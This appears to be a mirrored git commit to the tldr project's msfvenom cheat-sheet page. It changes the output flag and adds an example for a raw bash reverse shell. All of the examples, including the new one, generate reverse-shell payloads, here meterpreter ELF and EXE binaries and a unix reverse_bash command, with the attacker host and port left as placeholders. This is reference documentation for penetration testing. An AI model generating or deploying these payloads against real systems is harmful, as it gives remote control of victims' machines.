mirror of https://github.com/CrimsonTome/tldr.git
msfvenom: add raw example (#8095)
* Use built in output option in msfvenom * Add msfvenom example to generate bash reverse tcp handler * Add newline to the end of msfvenom file * Update pages/common/msfvenom.md Co-authored-by: Axel Navarro <navarroaxel@gmail.com> Co-authored-by: Axel Navarro <navarroaxel@gmail.com>htop
parent
4747947744
commit
cf7215e832
|
@ -17,8 +17,12 @@
|
|||
|
||||
- Create an ELF binary with a reverse TCP handler:
|
||||
|
||||
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > {{path/to/binary}}`
|
||||
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf -o {{path/to/binary}}`
|
||||
|
||||
- Create an EXE binary with a reverse TCP handler:
|
||||
|
||||
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe > {{path/to/binary.exe}}`
|
||||
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe -o {{path/to/binary.exe}}`
|
||||
|
||||
- Create a raw bash with a reverse TCP handler:
|
||||
|
||||
`msfvenom -p cmd/unix/reverse_bash LHOST={{local_ip}} LPORT={{local_port}} -f raw`
|
||||
|
|
Loading…
Reference in New Issue